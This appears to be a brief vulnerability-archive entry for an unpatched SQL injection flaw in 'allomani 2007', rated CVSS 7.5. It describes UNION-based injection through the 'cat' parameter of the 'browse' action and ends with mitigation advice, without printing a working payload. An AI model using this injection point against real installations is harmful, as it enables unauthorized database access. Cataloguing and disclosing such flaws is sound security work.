Vendor: allomani 2007
By: NeX HackEr
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: allomani 2007
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2007
allomani 2007 <= SQL Injection Vulnerability
An attacker can exploit this vulnerability by sending malicious SQL to the application through the 'cat' parameter of the 'browse' action. With the UNION operator, the attacker can combine the results of two or more SELECT statements into a single result set.
Mitigation:
The application should validate input and use parameterized queries to prevent SQL injection attacks.